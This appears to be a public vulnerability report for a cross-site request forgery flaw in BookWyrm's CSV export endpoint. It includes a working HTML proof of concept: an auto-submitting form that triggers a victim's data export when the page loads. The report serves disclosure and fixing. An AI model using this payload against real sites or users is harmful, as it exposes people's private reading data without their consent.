Cross-Site Request Forgery (CSRF) in bookwyrm-social/bookwyrm
Reported on
Jul 11th 2022
Description
An attacker is able to download data from a user via the CSV Export function. The export will include all the books on your shelves, books you have reviewed, and books with reading activity.
Vulnerable URL
https://bookwyrm.social/preferences/export/file
Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://bookwyrm.social/preferences/export/file">
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Impact
This vulnerability is capable of download user reading data.
Occurrences
SECURITY.md
exists
a year ago